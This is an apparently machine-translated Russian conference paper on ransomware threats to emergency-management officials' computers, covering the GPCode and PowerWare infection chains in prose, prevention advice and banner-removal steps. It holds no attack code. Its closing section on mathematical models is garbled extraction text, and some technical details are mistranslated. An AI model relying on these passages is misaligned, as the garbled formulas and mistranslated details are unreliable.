CC BY
78
Information Security of Automated Working Places in Case of Emergencies
PhD V.P. Andreev St. Petersburg University of the Ministry of Internal Affairs of Russia, St. Petersburg, Russia vl_pavl@mail.ru
PhD A.I. Dergachev Emperor Alexander I St. Petersburg State Transport University, St. Petersburg, Russia d_ader@mail.ru
Grand PhD A.K. Chernykh St. Petersburg Military Institute of the National Guard of the Russian Federation, St. Petersburg, Russia nataliachernykh@mail.ru
Abstract. Considered information threats to officials of the emergency management bodies engaged in planning the elimination of consequences of emergency situations using personal computers by ransomware. Preventive measures and ways of recovery of the data encrypted or blocked by the ransomware necessary for planning of the specified processes are also specified.
Keywords: information threats, unauthorized access, protection of confidential information, malware, ransomware.
Introduction
In accordance with the doctrine of information security of the Russian Federation [1], of particular relevance is the protection of data obtained by officials of the emergency management bodies (DL OU) from regional computer networks in the region in which it is necessary, in real time, to plan the elimination of the consequences of an emergency. Also quite relevant is the problem of protecting the results of the implementation of mathematical models used in the planning of emergency response.
Let us consider the main information threats to personal computers of officials of the emergency management bodies engaged in planning the elimination of the consequences of an emergency situation and measures to eliminate these threats.
At the core of the attacks on the personal computers of the officials, carried out by the user (hereinafter pests), trying to maximize it difficult to use data from regional networks that are required for the plan for elimination of consequences of emergency situations is the desire of these pests to disrupt the operational management of the specified processes [2-7].
In this regard, relevant is the development of methods of anti-malware programs that block computers for DL OU or encrypting all the data needed to plan elimination of consequences of emergency situations.
Malicious programs that block the operation
of computers
The most typical example of such programs is the Trojan program GPCode. This program, when infected, establishes a connection to the server and downloads the RCA public key to the computer, which encrypts the data on it. A new unique key was created for the next infected computer. Accordingly, only ransomware had private keys to decrypt the files. According to
Kaspersky Lab, the number of unique IP addresses of the victims ' computers from which requests for domains with sinkhole servers were received amounted to 2,764 in more than 30 countries [8]. In recent years, such ransomware programs have become less common, because they have ceased to be an unexpected "surprise" for DL OU, who already know the appropriate measures to be taken to solve the problems, so there are new ransomware programs and their modifications-only in 2016 there were 62 new families of these programs and about 40 thousand of their modifications [8].
It should be noted that the pests began to use more and more sophisticated methods of infection, for example, malicious code in the form of analytical scripts on the websites of scientific organizations to infect the devices of site visitors or quite legal software - administrative tools, various utilities to optimize or automate various tasks.
So in 2016, a whole family of new Powerware ransomware was discovered [9], using Microsoft Office application and PowerShell utility, which is part of the Windows operating system. PowerWare loads a Word document with macros. Macros are used to create and run a cmd file.an exe that calls a PowerShell utility with options that load malicious PowerWare code.
Of particular danger are the services that appeared in 2015, working on the Raas model - "extortion as a service", allowing any user, even without an appropriate education, to register on such services and start distributing Trojan ransomware. The danger is that the "services" of these servers can be used by novice users or technically unprepared pests, whose actions can lead to the inability to recover information in case of infection. As an example of such a service can serve as a service Satan, hosted in the anonymous network The Onion Router, known by the abbreviation Tor.
Preventive measures to prevent unauthorized access
to the personal computer of dl ou
To prevent unauthorized access to a personal computer and the risk of loss of confidential information or infection of computers by ransomware, the following preventive measures should be observed in the first place.
1. Use the services of a reliable Internet service. Data protection for DL OU without appropriate action on the part of the Internet services used for the planning of elimination of consequences of emergency situations impossible. Currently available methods of protection are not always enough,
although some services have begun to take additional measures to protect their users, for example, encryption of data transmitted between their own servers.
2. Do not use cloud storage as a backup for sensitive data. First, the information placed in the "cloud" is in almost free access for the developers of the service. Secondly, after a hacker attack on the "cloud" service, which does not have enough reliable protection against hacking, your data can be stolen or destroyed.
3. The main way to protect your personal computer is to install a reliable anti-virus program that can prevent infection. Modern, anti-virus products have an intrusion prevention system that blocks even unknown versions of Trojans, preventing them from entering the system. For example, a GPCode attack detects a Trojan-Dropper when it receives a spam email with a malicious DOC file attached.MSWord.Tored.a; a component that downloads a GPCode to a computer is defined as a Trojan-Downloader.Win32.Small.crb. GPCode itself is detected by antivirus. Working without anti-virus protection enabled, especially with files from dubious sources, can result in irretrievable loss of information. The main function of the anti-virus program-activity Monitoring, should always be enabled.
4. Make regular backups of your data, preferably on other devices.
5. Update the software on your computer in a timely manner. First of all, it concerns updates for the installed operating system, for application security systems as part of the operating system and malware removal tools. Updates improve the compatibility of the software installed on the computer, fix errors and vulnerable fragments of the operating system.
6. Keep confidential information separate from other data.
7. Do not use open Wi-Fi networks in public places. If necessary, you can use only those network names and passwords that you provide administrators of these places. When visiting sites where you are not sure of proper protection, in the settings, enable the item "Always use a secure connection" (HTTPS).
Note that if DL OU still became a victim of ransomware and the data on his computer were encrypted, you need to go to the site No More Ransom from an uninfected computer. In July 2016, the national police of the Netherlands, Europol and Intel Security and "Kaspersky Lab" has created a non-profit project "No More Ransom," with the purpose of helping to restore the blocked data ransomware.
In addition, the experts "Kaspersky Lab" has established its utility XoristDecryptor and RectorDecryptor to combat these programs.
If the launch of the utilities does not bring results, the malicious file will be sent to Kaspersky Lab, where it will be studied by experts and after the solution found to neutralize it entered into the database. Re-launch the utility should eliminate the infection.
Cases of blocking of computer banners with the requirement to send an SMS to get the unlock code less dangerous and usually experienced DL OU are able to unblock your computer. It should be noted that in such cases there is no universal solution. Since pests constantly modify malicious
code, the solutions for its neutralization depend on each specific case of infection.
In all cases of infection, almost the entire computer is blocked, including the start button and the task Manager program.
Algorithm unlock your computer
We propose the following algorithm to restore the locked data on the computer DL OU.
1. Restart the computer in safe mode and try to roll back the system. Helps rarely. Try to call the task Manager (when loading quickly press Ctrl+Alt+Delete) before the banner starts. If possible, select the Processes tab in the task Manager program and complete new unfamiliar processes. We try to determine the name of the banner process (skip some processes and see what it will lead to, if there is no banner -reboot, etc.). After determining the name of the process, carry out a search on it throughout the computer. It is necessary to enable the display of hidden files. Delete found files banner. Next, call the Run command (Windows + R) and in the dialog box that appears, enter the msconfig command. Select the startup tab. Check the properties of running programs: name, publisher, and activity impact. Disable suspicious of strangers program. Remember the name and location of their files. After deleting them, restart your computer.
2. To unlock the task Manager program and the registry system editor, you can use special programs-unlockers, for example, a portable version of Winhelper. The program runs on top of various banners ("On top of all Windows" mode). The "Recovery" tab will help to restore the registry editor, explorer shell.exe. In addition, in the "startup" tab, you can view all running programs.
3. Another quite effective way to unlock a personal computer is to use boot programs, such as WinDoza Live CD & USB, containing tools to restore the operating system after blocking it with a banner.
4. Finally, as part of one of the easiest ways to get rid of the Trojan blocker, you must contact the uninfected computer in the database unlock codes "Doctor Web" at https://www.drweb.com/xperf/ unlocker/?lng=ru and, using a special form, find the computer unlock code by wallet number, phone number or banner image.
Note. It is important to note that one can not be limited to unlocking the computer, it is also necessary to remove traces of the Trojan found.
Models with serial information
In conclusion, we present the concept of constructing such mathematical models, the use of which during an attack on the computer of an official of the emergency management body, minimizes the probability of blocking the information necessary for the implementation of the current calculation module of the model, preparing the initial data for planning the elimination of the consequences of an emergency situation and obtaining the results of the implementation of this model. It should be noted that the efficiency of the thus synthesized models calculated according to the approaches specified in [10, 11] is practically not reduced.
The idea here is that the information for the specified model is converted to a form that can be used for different
sequences of modules in the calculation scheme. The scheme information necessary to solve each of the calculation modules of automated formation of the structure configuration of the of the model is shown in fig. 1. calculation modules in order to consistently connect the
Fig. 1. Scheme for the automated generation of the configuration structure computation modules
As an explanation to fig. 4 note that the module M j is
connected to the module M g (block 3, fig. 1) is defined as a group of equality of the form:
v K = WK K = K g , K n (fig. 2X
WK - identifier of the k-th output parameter of the module M j ;
[k 0, K n ] - id change i
interval.
Selecting a new module Me {MN } for the module
where VK is the identifier of the k-th input parameter of the , ., . ,. .
K f t- role M o (block 11, fig. 1) is carried out according to the
module M
0 ;
rule:
M0 = maxMj e {MN }},
where {{MN } : M j , i = k —1,1, j = 1, n }, n is the number of modules.
6) He ranking of the modules
Fig 2. Fragment of the model structure
Summary
Thus, the article proposes:
- preventive measures to prevent unauthorized access to the personal computer of the Ministry of emergency situations;
- ways to restore encrypted or locked by a ransomware program data needed to plan elimination of consequences of emergency situation;
- the concept of building models, the use of which, during an attack on the computer of an official of the emergency management body, will minimize the probability of blocking the information necessary for the implementation of the model.
References
1. The doctrine of information security of the Russian Federation [Doktrina informatsionnoy bezopasnosti Rossiyskoy Federatsii]. Approved by the decree of the President of the Russian Federation of December, 5 2016 No. 646. Access from help legal system "ConsultantPlus".
2. Anisimov V.G., Selivanov A.A., Anisimov E.G. Methods of Evaluating the Effectiveness of Information Protection in the System of Interdepartmental Information Interaction with the Management of the Defense of the State [Metodika otsenki effektivnosti zashchity informatsii v sisteme mezhvedomstvennogo ihformatsionnogo vzaimodeystviya pri upravlenii oboronoy gosudarstva],
Information and Space [Informatsiya i kosmos], 2016, No. 4. -Pp. 76-80.
3. Bogoeva E.M. The Formalization of the Procedure of a Risk-based Approach in the Implementation of the Public Authorities Control Functions [Formalizatsiya protsedury risk-orientirovannogo podkhoda pri vypolnenii gosydarstvennymi organami kontroFnykh funktsiy], Bulletin of the Russian Customs Academy [Vestnik Rossiyskoy tamozhennoy akademii], 2014, No. 4 (29). - Pp. 96-102.
4. Balyasnikov V. V. Causal Model-based Analysis of Usage Data About the Special Situations [Model' prichinnogo analiza na osnove ispolzovaniya dannykh ob osobykh situatsiyakh], Questions of Defense Equipment. Series 16: Technical Means to Counter Terrorism [Voprosy oboronnoy tekhniki. Seriya 16: Tekhnicheskie sredstva protivodeistviya terrorizmu], 2015, No. 1-2. - Pp. 31-38.
5. Samolenkov V.A. Introduction to the theory of efficiency of combat actions of rocket troops and artillery: monograph [Vvedenie v teoriyu effektivnosti boevykh deystviy raketnykh voysk i artillerii: monografiya], Moscow, Military Academy of the General staff of the Armed Forces of the Russian Federation, 2008. - 180 p.
6. Anisimov V. G. Risk-oriented Approach to the Organization of Control in the Subsystems of Information Systems Security [Risk-orientirovannyy podkhod k organizatsii kontrolya v podsistemakh obespecheniya bezopasnosti informatsionnykh sistem], Information Security
Problems. Computer System [Problemy informatsionnoy bezopasnosti. Komp^yuternye sistemy], 2016, No. 3. - Pp. 6167.
7. Garkushev A.Y. Methodological basis for constructing indicators of effectiveness of control activities of public authorities [Metodologicheskie osnovy postroeniya pokazateley effektivnosti kontroFnoy deyateFnosti organov gosudarstvennoy vlasti] Questions of Defense Equipment. Series 16: Technical Means to Counter Terrorism [Voprosy oboronnoy tekhniki. Seriya 16: Tekhnicheskie sredstva protivodeistviya terrorizmu], 2015, No.3-4. - Pp. 17-20.
8. Anton Ivanov, David Emm, Fyodor Sinitsyn, Santiago Pontiroli. Kaspersky Security Bulletin 2016. The story of the year. Ransomware: a revolution [Kaspersky Security Bulletin 2016. Syuzhet goda. Programmy-vymogateli: revolyutsiya]. Available at: http://securelist.ru/analysis/ksb/29788/kaspersky-security-bulletin-2016-story-of-the-year (accessed 05.04.2017).
9. Mike Sconzo, Rico Valdez. Advanced Threat Protection, Detection and Response, Endpoint and Server
Security, Prevention, Ransomware, Response, Tech Toolbox. Availabe at: http://www.carbonblack.com/2016/03/25/threat-alert-powerware-new-ransomware-written-in-powershell-targets-organizations-via-microsoft-word (accessed
05.04.2017).
10. Maslakov M.D., Bagretsov S.A., Chernykh A.K. About one approach to evaluating the effectiveness of mathematical models [Ob odnom podkhode k otsenke effektivnosti matematicheskikh modeley], Problems of risk management in technosphere [Problemy upravleniya riskami v tekhosfere],
2013, No. 3 (27). - Pp. 67-73.
11. Artamonov V.S., Chernykh A.K., Klykov P.N. Approach to assessing the effectiveness of management systems of organizational systems operating in real time [Podkhod k otsenke effektivnosti sistem upravleniya organizatsionnymi sistemami, fuktsioniruyushchimi v real'nom masshtabe vremeni], Problems of risk management in technosphere [Problemy upravleniya riskami v tekhosfere],
2014, No. 4 (32). - Pp. 60-68.
Информационная безопасность автоматизированных рабочих мест при чрезвычайных ситуациях
В.П. Андреев, канд. воен. наук Санкт-Петербургский университет Министерства внутренних дел Российской Федерации, Санкт-Петербург, РФ vl_pavl@mail.ru;
А.И. Дергачёв, канд. воен. наук Петербургский государственный университет путей сообщения Императора Александра I Санкт-Петербург, РФ d_ader@mail.ru;
А.К. Черных, д-р техн. наук Санкт-Петербургский военный институт войск национальной гвардии Российской Федерации Санкт-Петербург, РФ nataliachemykh@mail.ru
Аннотация. Рассмотрены информационные угрозы для должностных лиц органов управления МЧС, осуществляющих планирование ликвидации последствий чрезвычайных ситуаций с использованием персональных компьютеров, со стороны программ-вымогателей. Указаны
профилактические меры и пути восстановления зашифрованных или заблокированных программой-вымогателем данных, необходимых для планирования указанных процессов.
Ключевые слова: информационные угрозы, несанкционированный доступ, защита
конфиденциальной информации, вредоносные программы, программы-вымогатели.
Литература
1. Доктрина информационной безопасности Российской Федерации. Утверждена Указом Президента Российской Федерации от 5 декабря 2016 г. № 646. Доступ из справочно-правовой системы «КонсультантПлюс».
2. Анисимов В.Г. Методика оценки эффективности защиты информации в системе межведомственного информационного взаимодействия при управлении обороной государства / В.Г. Анисимов, А.А. Селиванов, Е.Г. Анисимов // Информация и космос. - 2016. - № 4. -С. 76-80.
3. Богоева Е.М. Формализация процедуры риск-ориентированного подхода при выполнении государственными органами контрольных функций / Е.М. Богоева [и др.] // Вестник Российской таможенной академии. - 2014. - № 4 (29). - С. 96-102.
4. Балясников В.В. Модель причинного анализа на основе использования данных об особых ситуациях / В.В. Балясников Ю.В. Ведерников [и др.] // Вопросы оборонной техники. Серия 16. Технические средства противодействия терроризму. - 2015. - № 1-2. - С. 31-38.
5. Самоленков В.А. Введение в теорию эффективности боевых действий ракетных войск и артиллерии: монография / В.А. Самоленков [и др.]. - М. : Военная академия генерального штаба Вооруженных Сил Российской Федерации, 2008. - 180 с.
6. Анисимов В.Г. Риск-ориентированный подход к организации контроля в подсистемах обеспечения безопасности информационных систем / В.Г. Анисимов, Е.Г. Анисимов [и др.] // Проблемы информационной безопасности. Компьютерные системы. - 2016. - № 3. -С. 61-67.
7. Гарькушев А.Ю. Методологические основы построения показателей эффективности контрольной деятельности органов государственной власти / А.Ю. Гарькушев, Т.Н. Сауренко [и др.] // Вопросы оборонной техники. Серия 16. Технические средства противодействия терроризму. - 2015. - № 3-4. - С. 17-20.
8. Иванов А., Эмм Д., Синицын Ф., Понтироли С. Kaspersky Security Bulletin 2016. Сюжет года. Программы-вымогатели: революция. Режим доступа: http://securelist.ru/analysis/ksb/29788/kaspersky-security-bulletin-2016-story-of-the-year (дата обращения 05.04.2017).
9. Mike Sconzo and Rico Valdez. Advanced Threat Protection, Detection and Response, Endpoint and Server Security, Prevention, Ransomware, Response, Tech Toolbox. Режим доступа: https://www.carbonblack.com/ 2016/03/25/threat-alert-powerware-new-ransomware-written-in-powershell-targets-organizations-via-microsoft-word (дата обращения 05.04.2017).
10. Маслаков М.Д. Об одном подходе к оценке эффективности математических моделей / М.Д. Маслаков, С.А. Багрецов, А.К. Черных // Проблемы управления рисками в техносфере. - 2013. - № 3 (27). - С. 67-73.
11. Артамонов В.С. Подход к оценке эффективности систем управления организационными системами, функционирующими в реальном масштабе времени / А.К. Черных, П.Н. Клыков // Проблемы управления рисками в техносфере. - 2014. - № 4 (32). - С. 60-68.
